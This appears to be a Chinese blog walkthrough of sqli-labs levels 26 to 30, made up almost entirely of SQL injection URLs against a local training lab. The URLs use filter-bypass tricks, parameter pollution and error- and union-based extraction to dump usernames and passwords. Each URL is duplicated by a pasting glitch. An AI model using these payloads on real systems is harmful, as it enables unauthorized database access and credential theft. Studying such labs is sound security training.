sqli-labsSQL手工注入第26-30关

第26关

一.查询数据库

http://127.0.0.1/Less-26/?id=11%27%26extractvalue(1,concat(%27~%27,database(),%27~%27))%261=%27

二.查表

http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=%27security%27))),1))||%27http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=%27security%27))),1))||%27

三.查列

http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema=%27security%27aandnd(table_name=%27users%27)))),1))||%27http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema=%27security%27aandnd(table_name=%27users%27)))),1))||%27

四.查user表里信息

http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(group_concat(passwoorrd,username))from(users))),1))||%27http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(group_concat(passwoorrd,username))from(users))),1))||%27

第27关

一.查询数据库

http://127.0.0.1/Less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09database())),1)and%27http://127.0.0.1/Less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09database())),1)and%27

二.查表

http://127.0.0.1/Less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09group_concat(table_name)%09from%09information_schema.tables%09where%09table_schema=%27security%27)),1)and%27http://127.0.0.1/Less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09group_concat(table_name)%09from%09information_schema.tables%09where%09table_schema=%27security%27)),1)and%27

三.查列

http://127.0.0.1/Less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09group_concat(column_name)%09from%09information_schema.columns%09where%09table_schema=%27security%27%09and%09table_name=%27users%27)),1)and%27http://127.0.0.1/Less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09group_concat(column_name)%09from%09information_schema.columns%09where%09table_schema=%27security%27%09and%09table_name=%27users%27)),1)and%27

四.查user表里信息

http://127.0.0.1/Less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09group_concat(username,password)%09from%09users)),1)and%27http://127.0.0.1/Less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09group_concat(username,password)%09from%09users)),1)and%27

第28关

一.查询数据库

http://127.0.0.1/Less-28/?id=88%27)uni%20union%0Aselecton%0Aselect%0A1,database(),2%0Aand%20(%271http://127.0.0.1/Less-28/?id=88%27)uni%20union%0Aselecton%0Aselect%0A1,database(),2%0Aand%20(%271

二.查表

http://127.0.0.1/Less-28/?id=88%27)uni%20union%0Aselecton%0Aselect%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema=%27security%27%0Aand%0Atable_name=%27users%27%0Aand(%271http://127.0.0.1/Less-28/?id=88%27)uni%20union%0Aselecton%0Aselect%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema=%27security%27%0Aand%0Atable_name=%27users%27%0Aand(%271

三.查列

http://127.0.0.1/Less-28/?id=88%27)uniunion%0Aselecton%0Aselect%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema=%27security%27%0Aand%0Atable_name=%27users%27%0Aand(%271http://127.0.0.1/Less-28/?id=88%27)uniunion%0Aselecton%0Aselect%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema=%27security%27%0Aand%0Atable_name=%27users%27%0Aand(%271

四.查询user表中信息

http://127.0.0.1/Less-28/?id=88%27)union%0Aunion%0Aselectselect%0A1,group_concat(username,password),3%0Afrom%0Ausers%0Awhere%0A1=1%0Aand(%271%27)=(%271http://127.0.0.1/Less-28/?id=88%27)union%0Aunion%0Aselectselect%0A1,group_concat(username,password),3%0Afrom%0Ausers%0Awhere%0A1=1%0Aand(%271%27)=(%271

第29关

一.查询数据库

http://127.0.0.1/Less-29/?id=1&id=-1%27union%20select%201,database(),3%20--+http://127.0.0.1/Less-29/?id=1&id=-1%27union%20select%201,database(),3%20--+

二.查表

http://127.0.0.1/Less-29/?id=-1%27union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20--+http://127.0.0.1/Less-29/?id=-1%27union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20--+

三.查列

http://127.0.0.1/Less-29/?id=1&id=-1%27union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20--+http://127.0.0.1/Less-29/?id=1&id=-1%27union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20--+

四.查user表中信息

http://127.0.0.1/Less-29/?id=1&id=-1%27union%20select%201,2,group_concat(id,username,password)%20from%20users%20--+http://127.0.0.1/Less-29/?id=1&id=-1%27union%20select%201,2,group_concat(id,username,password)%20from%20users%20--+

第30关

一.查询数据库

http://127.0.0.1/Less-30/?id=1&id=-1%22union%20select%201,database(),3%20--+http://127.0.0.1/Less-30/?id=1&id=-1%22union%20select%201,database(),3%20--+

二.查表

http://127.0.0.1/Less-30/?id=1&id=-1%22union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20--+http://127.0.0.1/Less-30/?id=1&id=-1%22union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20--+

三.查列

http://127.0.0.1/Less-30/?id=1&id=-1%22union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20--+http://127.0.0.1/Less-30/?id=1&id=-1%22union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20--+

四.查user表中信息

http://127.0.0.1/Less-30/?id=1&id=-1%22union%20select%201,2,group_concat(id,username,password)%20from%20users%20--+http://127.0.0.1/Less-30/?id=1&id=-1%22union%20select%201,2,group_concat(id,username,password)%20from%20users%20--+

相关推荐
小马哥编程36 分钟前
【iSAQB软件架构】架构决策记录-ADR
数据库·架构·系统架构·设计规范
萧鼎1 小时前
深度探索 Py2neo:用 Python 玩转图数据库 Neo4j
数据库·python·neo4j
m0_653031361 小时前
腾讯云认证考试报名 - TDSQL数据库交付运维专家(TCCE MySQL版)
运维·数据库·腾讯云
power 雀儿2 小时前
集群聊天服务器---MySQL数据库的建立
服务器·数据库·mysql
骑着王八撵玉兔3 小时前
【性能优化与架构调优(二)】高性能数据库设计与优化
数据库·性能优化·架构
想要入门的程序猿4 小时前
Qt写入excel
数据库·qt·excel
Q_970956395 小时前
java+vue+SpringBoo校园失物招领网站(程序+数据库+报告+部署教程+答辩指导)
java·数据库·vue.js
Wyc724095 小时前
Maven
java·数据库·maven
程序猿小D5 小时前
[附源码+数据库+毕业论文]基于Spring+MyBatis+MySQL+Maven+jsp实现的电影小说网站管理系统,推荐!
java·数据库·mysql·spring·毕业设计·ssm框架·电影小说网站
羊小猪~~5 小时前
数据库学习笔记(十七)--触发器的使用
数据库·人工智能·后端·sql·深度学习·mysql·考研